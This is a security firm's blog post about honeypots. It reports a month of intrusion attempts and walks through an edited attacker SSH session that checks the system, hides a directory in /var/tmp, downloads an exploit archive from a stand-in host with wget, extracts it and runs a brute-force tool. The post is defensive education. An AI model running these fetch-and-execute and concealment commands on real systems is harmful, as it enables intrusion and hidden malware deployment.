Honeypots - Watching the hacker in action
A honeypot is an application that simulates operating systems and network applications with vulnerabilities while silently logging the attacker's moves. The objective is to trap hackers and learn about their behaviour, to collect malware for analysis, and to distract the attacker from real systems.
WatSec provisioned a VPS (Virtual Private Server) in the cloud and installed two honeypot systems. One honeypot application offered a secure shell (SSH) service and the other simulated several services with well-known vulnerabilities.
The SSH honeypot had a 'root' (system administrator) account and password. Five hours after the server was created - with an IP address that was inactive for some time - we detected the first successful intrusion; a scanner being run by a malicious agent had detected the open SSH service and guessed the root password.
After running this server for a month WatSec found 75 malicious uploads and 2,483 probes or exploit attempts from many parts of the world.
Here's an example of an intruder's SSH session which is from a real interaction. We did some editing for clarification.
First the attacker checks if someone is logged in and looks for some basic information about the system:
$ w
$ cat /proc/cpuinfo;uname -a;
Then he creates a hidden directory (its name is just one space) in the temporary directory, which is usually writable by anyone and thus a favorite destination for crackers:
$ cd /var/tmp;mkdir " ";cd " ";mkdir .ssh;cd .ssh;
Now he downloads a compressed exploit:
$ wget http://somebadsite.expl.tgz
Next he prepares the file, extracting it and making it executable:
$ tar xvf expl.tgz;rm -rf expl.tgz;cd expl;chmod +xw *
Finally he runs the malicious software, which in this case is an SSH brute force tool, which could be used, for example, to break into an accounting system:
$ ./a1
The lesson here is that if you have a network service exposed to the Internet with a weak password or a known vulnerability it’s only a matter of hours or days until your server is compromised.
Take a preventative approach to cybercrime
How do you know if your data really is protected?
Contact us today for a free consultation.
(519) 747 2549
